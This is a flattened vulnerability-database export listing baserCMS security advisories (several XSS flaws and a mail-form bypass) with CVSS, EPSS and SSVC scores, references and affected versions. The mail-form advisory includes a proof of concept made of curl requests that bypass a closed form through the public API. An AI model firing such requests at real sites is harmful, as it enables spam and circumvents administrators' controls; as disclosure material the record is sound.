reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
reference_id
reference_type
scores
0
value 0.00145
scoring_system epss
scoring_elements 0.34571
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30940
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
reference_id
reference_type
scores
0
value 7.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30940
6
reference_url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
reference_id GHSA-c5c6-37vq-pjcq
reference_type
scores
url https://github.com/advisories/GHSA-c5c6-37vq-pjcq
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30940, GHSA-c5c6-37vq-pjcq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge
7
url VCID-8ssu-umet-37bk
vulnerability_id VCID-8ssu-umet-37bk
summary 
baserCMS is Vulnerable to Cross-site Scripting
baserCMS has DOM-based cross-site scripting in tag creation.

### Target
baserCMS 5.2.2 and earlier versions

### Vulnerability
 Malicious JavaScript may be executed when creating a tag.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_94952030

### Credits

- quanlna2 (Le Nguyen Anh Quan)
- namdi (Do Ich Nam)
- minhnn42 (Nguyen Ngoc Minh)
- VCSLab - Viettel Cyber Security
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-32734
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-32734
6
reference_url https://github.com/advisories/GHSA-677c-xv24-crgx
reference_id GHSA-677c-xv24-crgx
reference_type
scores
url https://github.com/advisories/GHSA-677c-xv24-crgx
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-32734, GHSA-677c-xv24-crgx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk
8
url VCID-ays7-6wvh-augt
vulnerability_id VCID-ays7-6wvh-augt
summary 
baserCMS vulnerable to stored Cross-site Scripting
Stored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-42486
reference_id
reference_type
scores
0
value 0.00144
scoring_system epss
scoring_elements 0.3445
published_at 2026-06-04T12:55:00Z
1
value 0.00144
scoring_system epss
scoring_elements 0.34547
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-42486
1
reference_url https://basercms.net/security/JVN_53682526
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/
url https://basercms.net/security/JVN_53682526
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://jvn.jp/en/jp/JVN53682526/index.html
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/
url https://jvn.jp/en/jp/JVN53682526/index.html
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-42486
reference_id
reference_type
scores
0
value 4.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-42486
5
reference_url https://github.com/advisories/GHSA-7w2v-35j3-xrm9
reference_id GHSA-7w2v-35j3-xrm9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7w2v-35j3-xrm9
fixed_packages
0
url pkg:composer/baserproject/basercms@4.7.2
purl pkg:composer/baserproject/basercms@4.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-g56w-z9cx-5ygv
7
vulnerability VCID-ggv8-3v9t-mfea
8
vulnerability VCID-j37y-gws9-ake9
9
vulnerability VCID-jby7-s5ez-dqb3
10
vulnerability VCID-k5qv-4yp3-zbgf
11
vulnerability VCID-khft-xvrw-g3dr
12
vulnerability VCID-mfm9-gsh3-ubg8
13
vulnerability VCID-nxrf-64er-xbfx
14
vulnerability VCID-p695-t9ye-v3ga
15
vulnerability VCID-pd8c-9d7z-zkhg
16
vulnerability VCID-sqr4-v889-tff8
17
vulnerability VCID-u16w-rbuk-ybfs
18
vulnerability VCID-uedz-j2vn-cbea
19
vulnerability VCID-y2sz-c6vb-pkdp
20
vulnerability VCID-zqd4-rdem-jfgk
21
vulnerability VCID-zsgc-fnen-b7a6
22
vulnerability VCID-zxns-tzw3-27fr
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2
aliases CVE-2022-42486, GHSA-7w2v-35j3-xrm9
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ays7-6wvh-augt
9
url VCID-d1sf-cmct-zbh1
vulnerability_id VCID-d1sf-cmct-zbh1
summary 
baserCMS has Mail Form Acceptance Bypass via Public API
### Summary
A public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.

### Details
In baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).

These checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  
(e.g. `plugins/bc-mail/src/Controller/MailController.php`).

However, the public API endpoint:

`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`

does not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.

The endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.

### PoC
1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. outside its acceptance period or explicitly closed).
2. Obtain a CSRF cookie by accessing the site root:
```
curl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'
```
3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:
```
curl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' 
-H 'Content-Type: application/x-www-form-urlencoded' 
-H 'Referer: http://localhost/' 
-H 'X-CSRF-Token: <csrf-token-from-cookie>' 
-b /tmp/basercms_cookies.txt 
--data-urlencode 'name_1=Test' 
--data-urlencode 'name_2=User' 
--data-urlencode 'email_1=test@example.com' 
--data-urlencode 'email_2=test@example.com' 
--data-urlencode 'category[]=資料請求' 
--data-urlencode 'root=検索エンジン' 
--data-urlencode 'message=API bypass test'
```
4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.

### Impact
This is an access control / business logic bypass vulnerability.

Administrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
reference_id
reference_type
scores
0
value 0.0002
scoring_system epss
scoring_elements 0.05615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30878
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30878
6
reference_url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
reference_id GHSA-8cr7-r8qw-gp3c
reference_type
scores
url https://github.com/advisories/GHSA-8cr7-r8qw-gp3c
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30878, GHSA-8cr7-r8qw-gp3c
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1
10
url VCID-eq7f-n3g5-s3hu
vulnerability_id VCID-eq7f-n3g5-s3hu
summary 
Cross-site Scripting
Improper neutralization of JavaScript input in the page editing function of baserCMS allows remote authenticated attackers to inject an arbitrary script via unspecified vectors.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-20681
reference_id
reference_type
scores
0
value 0.00203
scoring_system epss
scoring_elements 0.42327
published_at 2026-06-04T12:55:00Z
1
value 0.00203
scoring_system epss
scoring_elements 0.42402
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-20681
1
reference_url https://basercms.net/security/JVN64869876
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://basercms.net/security/JVN64869876
2
reference_url https://jvn.jp/en/jp/JVN64869876/index.html
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://jvn.jp/en/jp/JVN64869876/index.html
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2021-20681
reference_id CVE-2021-20681
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2021-20681
fixed_packages
0
url pkg:composer/baserproject/basercms@4.4.5
purl pkg:composer/baserproject/basercms@4.4.5
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-5ay3-1t5g-vycu
3
vulnerability VCID-7x3n-4c2b-nfbx
4
vulnerability VCID-891u-x525-ykbb
5
vulnerability VCID-8buz-nsr9-3yge
6
vulnerability VCID-8ssu-umet-37bk
7
vulnerability VCID-ays7-6wvh-augt
8
vulnerability VCID-d1sf-cmct-zbh1
9
vulnerability VCID-g56w-z9cx-5ygv
10
vulnerability VCID-ggv8-3v9t-mfea
11
vulnerability VCID-hpk4-a6tr-3ffe
12
vulnerability VCID-j37y-gws9-ake9
13
vulnerability VCID-jby7-s5ez-dqb3
14
vulnerability VCID-k575-suuf-7bhf
15
vulnerability VCID-k5qv-4yp3-zbgf
16
vulnerability VCID-khft-xvrw-g3dr
17
vulnerability VCID-kmpp-6j49-pqfz
18
vulnerability VCID-mfm9-gsh3-ubg8
19
vulnerability VCID-nxrf-64er-xbfx
20
vulnerability VCID-p695-t9ye-v3ga
21
vulnerability VCID-pd8c-9d7z-zkhg
22
vulnerability VCID-sqr4-v889-tff8
23
vulnerability VCID-u16w-rbuk-ybfs
24
vulnerability VCID-uedz-j2vn-cbea
25
vulnerability VCID-y2sz-c6vb-pkdp
26
vulnerability VCID-zqd4-rdem-jfgk
27
vulnerability VCID-zsgc-fnen-b7a6
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5
aliases CVE-2021-20681, GHSA-24p5-x9f9-vvpx
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-eq7f-n3g5-s3hu
11
url VCID-g56w-z9cx-5ygv
vulnerability_id VCID-g56w-z9cx-5ygv
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
reference_id
reference_type
scores
0
value 0.0055
scoring_system epss
scoring_elements 0.68361
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
1
reference_url https://basercms.net/security/JVN_45547161
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://basercms.net/security/JVN_45547161
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
6
reference_url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0-beta1
purl pkg:composer/baserproject/basercms@5.0.0-beta1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1
aliases CVE-2023-29009, GHSA-8vqx-prq4-rqrq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv
12
url VCID-ggv8-3v9t-mfea
vulnerability_id VCID-ggv8-3v9t-mfea
summary 
baserCMS Cross-site Scripting vulnerability in Site search Feature
There is a XSS Vulnerability in Site search Feature to baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
reference_id
reference_type
scores
0
value 0.00622
scoring_system epss
scoring_elements 0.70549
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-44379
1
reference_url https://basercms.net/security/JVN_73283159
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://basercms.net/security/JVN_73283159
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/commit/18549396e5a9b8294306a54a876af164b0b57da4
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
reference_id CVE-2023-44379
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-44379
5
reference_url https://github.com/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-66c2-p8rh-qx87
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
reference_id GHSA-66c2-p8rh-qx87
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:39:22Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-66c2-p8rh-qx87
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-44379, GHSA-66c2-p8rh-qx87
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-ggv8-3v9t-mfea
13
url VCID-hpk4-a6tr-3ffe
vulnerability_id VCID-hpk4-a6tr-3ffe
summary baserCMS is an open source content management system with a focus on Japanese language support. A Cross-site Scripting vulnerability has been identified.
references
0
reference_url http://jvn.jp/en/jp/JVN14134801/index.html
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url http://jvn.jp/en/jp/JVN14134801/index.html
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2021-39136
reference_id
reference_type
scores
0
value 0.0054
scoring_system epss
scoring_elements 0.67989
published_at 2026-06-05T12:55:00Z
1
value 0.0054
scoring_system epss
scoring_elements 0.6795
published_at 2026-06-04T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2021-39136
2
reference_url https://basercms.net/security/JVN_14134801
reference_id
reference_type
scores
0
value 8.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N
1
value HIGH
